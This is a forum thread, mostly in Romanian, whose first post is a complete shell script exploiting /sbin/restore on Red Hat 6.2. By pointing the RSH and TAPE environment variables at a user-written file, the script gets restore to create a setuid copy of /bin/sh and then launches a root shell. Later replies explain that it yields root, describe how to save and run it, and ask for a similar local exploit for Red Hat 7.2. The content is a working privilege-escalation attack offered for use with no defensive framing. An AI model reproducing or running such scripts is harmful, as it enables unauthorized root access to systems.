AlucardHao Posted September 27, 2007 Report Posted September 27, 2007 #!/bin/sh## /sbin/restore exploit for rh6.2## I did not find this weakness my self, all i did was# writing this script (and some more) to make it # automatic and easy to use.## This exploit should work on all redhat 6.2 systems# with /sbin/restore not "fucked up". May work on other# distros too, but only tested successfully on rh6.2.## Make sure that the $USER variable is set! If you aren't# sure, do a SET USER=<your-login-name> before you start# the exploit!## Please do NOT remove this header from the file.#echo "###########################################"echo "# /sbin/restore exploit for rh6.2 #"echo "# this file by nawok '00 #"echo "###########################################"echo " "echo "==> EXPLOIT STARTED, Wait..."echo "#!/bin/sh" >> /home/$USER/execfileecho "cp /bin/sh /home/$USER/sh" >> /home/$USER/execfileecho "chmod 4755 /home/$USER/sh" >> /home/$USER/execfilechmod 755 /home/$USER/execfileexport TAPE=restorer:restorerexport RSH=/home/$USER/execfiletouch /tmp/1/sbin/restore -t /tmp/1rm -f /home/$USER/execfileecho "==> DONE! If everything went OK we will now enter rootshell..."echo "==> To check if its rooted, type 'whoami', or 'id'" echo "==> B-Bye, you are on your own now."/home/$USER/sh Quote
MrRip Posted November 22, 2008 Report Posted November 22, 2008 Deci ce face ?Daca te-ai stradui caturi de putin sa incerci sa citesti ce scria acolo in exploit , nu ma refer la partea de scripting , ci deasupra , si normal , daca mai stii si doua boabe de engleza si daca ti-ai fi pus mintea la contributie ai fi priceput sigur . Dar deh ... Quote
nsilviu Posted November 23, 2008 Report Posted November 23, 2008 Bun dar la cata engleza stiu yo...Si oricum nu era un raspuns la ce am intrebat yo e mai mult o critica...Zimi macar ce face ? Quote
paxnWo Posted November 23, 2008 Report Posted November 23, 2008 Deci ce face ?rootshell .adica ai privilegii de admin . Quote
nsilviu Posted November 23, 2008 Report Posted November 23, 2008 aha bun asta si cautam drepturi de root dar intrebarea este pt. ce versiuni....In ce extensie se salveaza? Quote
paxnWo Posted November 23, 2008 Report Posted November 23, 2008 exploitul este pt redhat 6.2 si se executa din shell .touch exploit.run | most copiezi exploitul si ii dai save . exploit.run Quote
DraPre Posted November 25, 2008 Report Posted November 25, 2008 ma gandeam ca poate postezi si un local pentru rh 7.2 daca gasesti Quote
